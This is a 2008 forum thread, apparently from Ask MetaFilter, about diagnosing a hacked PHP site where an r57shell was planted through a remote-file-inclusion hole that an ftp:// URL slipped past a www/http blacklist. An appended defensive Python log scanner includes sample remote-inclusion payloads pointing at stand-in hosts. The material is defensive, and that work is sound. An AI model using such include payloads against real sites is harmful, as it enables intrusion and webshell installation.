

hacked again
May 5, 2008 8:43 PM   Subscribe

Site hacked again 4 years later. I need some advice.

So about 4 years ago I asked this question. Nothing much happened to my site then other than an index.html file being created which defaced my site.
Then today I got a not-too-official email from PayPal telling me my site had been compromised. The email looked weird and had a URL in it within my site. I opened a new tab, hand-typed the URL, and it exists.
I ssh'd into my site and ran ls -alt to find the most recent changes. I had not done anything in 2008, so it was really obvious what was new and modified. So I cleaned up the mess and changed the login info.
I renamed and moved the new files so I could look at them, and found r57shell was used. Mail logs have tons of outgoing.
The oldest file that was changed was from the end of Jan 08. My logs only go back to mid-March, so I cannot see what got through. I had changed my old code to ignore variables with www or http. I do have awstats, whose pages/URLs I perused to see if anything in Jan stuck out. Nothing did.
I'm going to redo the site completely, but wonder how they got in.
And PayPal/eBay asked me to help by giving them any logs that might help them.
posted by sailormouth to Computers & Internet (14 answers total)
 
It may just be me, but where is the question?
posted by petethered at 9:28 PM on May 5, 2008


I think he's looking for advice on figuring out how the cracker got in, given the audit trail is kinda cold.
posted by hattifattener at 9:35 PM on May 5, 2008


Long day.
Yes, I am looking for advice as to where I might find a clue to what exactly the weakness was this time.
No raw logs from the time it happened.
Got awstats, but I am not seeing anything obvious.
Did not find much useful info about how r57shell could get installed.
posted by sailormouth at 9:39 PM on May 5, 2008


Was awstats installed at the time? I've seen awstats used as an attack vector.
posted by easyasy3k at 9:54 PM on May 5, 2008


Yes, awstats was installed and running.
posted by sailormouth at 10:13 PM on May 5, 2008


Does this help?

http://www.phpbuilder.com/board/showthread.php?t=10335348
posted by mattoxic at 10:25 PM on May 5, 2008


Actually, I did read that thread before I posted.
I am hosted on 1and1, so I have no control over the PHP config.
The talk in that thread about not allowing outside sites to pipe through your site (www.mysite.com/index.php?var=http://www.badguysite.com/gotcha/cmd.txt) is what I did 4 years ago, and I had not had any problems until now.
When I would check the stats, either from 1and1 or awstats, I could see attempts at that, but my code would ignore vars pointing from outside my site. I only had one var.
posted by sailormouth at 10:41 PM on May 5, 2008


There are 3 main possibilities:
1. Your app is vulnerable.
2. Third party software you're using is vulnerable.
3. Something else on the box that's nothing to do with you got hacked.

If you're on bog-standard shared hosting then (3) is fairly likely, as it only takes one of the hundreds of other sites on the server to offer a way in and then a privilege escalation will allow them to deface everything. A couple of my clients with sites on shared hosting got affected in this way recently.

However, you should also check your awstats is up to date, and are you absolutely sure the change to your app blocks all malicious uses? Make sure you use a whitelist instead of just blacklisting a few strings.
posted by malevolent at 12:38 AM on May 6, 2008


What is your site built on? Are you using WordPress, Joomla, Drupal, anything other than plain old HTML?
posted by DarlingBri at 2:33 AM on May 6, 2008


Though 3 could be possible, I am pretty sure I had a vulnerability, mostly because when we added my wife's domain to our plan, 1and1 created her space one level above mine. So in the filesystem structure they would have to go through her site to get to mine. Nothing was touched in her files.
The hosting is shared linux box. Handcoded php and html.
posted by sailormouth at 6:29 AM on May 6, 2008


Creating good passwords and changing them regularly?
posted by loiseau at 6:38 AM on May 6, 2008


I have copied all the logs I have to look at on downtime at work.
posted by sailormouth at 6:58 AM on May 6, 2008


FWIW, I found the security hole in one of my sites after a similar attack by looking at the log files and seeing the types of attacks that were coming in (quite literally hundreds per day).

They are just trying different things, fishing for vulnerabilities, so it was pretty easy to see that most of them were trying to reach files/directories that didn't even exist.

However, any that were reaching an actual file, I would just copy & paste into my browser and try it (most were trying to load some malicious file, like your example above, so obviously I would modify it slightly so as not to actually load the malicious file). Lo and behold, and much to my amazement, one of these attacks actually worked.

It was a bug I thought I had patched, but (obviously) hadn't.

Point is, by looking at the log files--not even necessarily the ones from months ago when the attack happened, maybe just from the log files for the last couple of weeks--you can get a grasp of the type of attacks that are directed at your site & that may lead to some ideas about how to address the issues.

Another possible vector: lots of viruses/malware nowadays will go through your hard drive and add a bit of malicious code into each HTML or PHP file they find. When you upload this corrupted file to your web site, the problems begin.

So--check your home computer for viruses/malware and also, check the files/source code that are actually on your web site to make sure there are no added funny bits.
posted by flug at 11:25 AM on May 6, 2008


Well after spending some time looking through the logs I think I found what they did.
It looks like they pointed to their file on ftp, not http or www, which was what I was looking for in the var. Logs are always full of www and http, so I did not see the ftp at first.
flug, yes, I test by plugging in their variations but substituting safe files.
Thank you everyone for your input.
posted by sailormouth at 3:00 PM on May 6, 2008
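An added example, not from anyone in this thread: the asker's fix ignored include values mentioning "www" or "http", malevolent suggested a whitelist instead, flug described combing the access log for attacks that reach a real file, and the asker's final finding was that the attacker used an ftp:// URL. The script below models all three points in Python (the site itself is handcoded PHP; the include logic is only approximated here). The parameter name "var", the page names, the real paths and the access-log lines are all constructed for this example and are not from the asker's site.

```python
"""
Blacklist vs. whitelist for a PHP-style include parameter, plus a scanner
that pulls remote-file-inclusion attempts out of access-log lines whatever
the URL scheme. Added illustration; names, paths and log lines are made up.
"""
import re
from urllib.parse import parse_qs, urlsplit

# The one include parameter the asker mentions; the name is an assumption.
INCLUDE_PARAM = "var"

# Pages the site really serves. A whitelist only ever accepts these.
ALLOWED_PAGES = {"home", "about", "contact", "gallery"}


def blacklist_allows(value: str) -> bool:
    """Approximation of the asker's original fix: drop values that mention
    www or http (case-insensitive substring match); anything else passes."""
    lowered = value.lower()
    return "www" not in lowered and "http" not in lowered


def whitelist_allows(value: str) -> bool:
    """Accept only a known page name; every scheme, path and traversal fails."""
    return value in ALLOWED_PAGES


# Any URL scheme at the start of the value: http, https, ftp, php, data, ...
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]*:", re.IGNORECASE)


def looks_like_remote_include(value: str) -> bool:
    """True when the value is a URL, an absolute path, or a traversal,
    i.e. anything an include() should never see from the query string."""
    return bool(SCHEME_RE.match(value)) or ".." in value or value.startswith("/")


# Common/combined log format: ip ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_log(lines, real_paths):
    """Return (path, value, status) for requests that hit a path that exists
    on the site AND pass a remote-looking value in the include parameter.
    Requests to paths that do not exist are the fishing noise flug describes."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path not in real_paths:
            continue
        values = parse_qs(parts.query, keep_blank_values=True).get(INCLUDE_PARAM, [])
        for value in values:
            if looks_like_remote_include(value):
                hits.append((parts.path, value, int(m.group("status"))))
    return hits


def slipped_past_blacklist(hits):
    """Attempts the www/http blacklist would have let through but the
    whitelist rejects; this is the gap the thread ended up finding."""
    return [(path, value) for path, value, _ in hits
            if blacklist_allows(value) and not whitelist_allows(value)]


# Constructed sample log: two real-file hits, one probe of a non-existent
# phpBB path, and one legitimate request. Addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Jan/2008:03:14:07 -0500] "GET /index.php?var=http://www.example.org/cmd.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [28/Jan/2008:03:14:09 -0500] "GET /index.php?var=ftp://anonymous@203.0.113.7/r57.txt? HTTP/1.1" 200 4096',
    '198.51.100.9 - - [28/Jan/2008:03:15:01 -0500] "GET /phpbb/admin/admin_styles.php?phpbb_root_path=http://203.0.113.7/c.txt? HTTP/1.1" 404 221',
    '192.0.2.4 - - [28/Jan/2008:09:00:00 -0500] "GET /index.php?var=about HTTP/1.1" 200 2048',
]
REAL_PATHS = {"/index.php", "/gallery.php"}

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG, REAL_PATHS)
    for path, value, status in found:
        print(f"{status} {path} {INCLUDE_PARAM}={value}")
    for path, value in slipped_past_blacklist(found):
        print(f"blacklist missed: {path} {INCLUDE_PARAM}={value}")
```

Run against the constructed log, the scanner reports both requests that reached /index.php with a URL in the include parameter and ignores the phpBB probe against a path that does not exist; the ftp:// value is the one the www/http blacklist passes and the whitelist rejects. The whitelist is the check to keep: it decides what a value may be rather than guessing what it may not.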

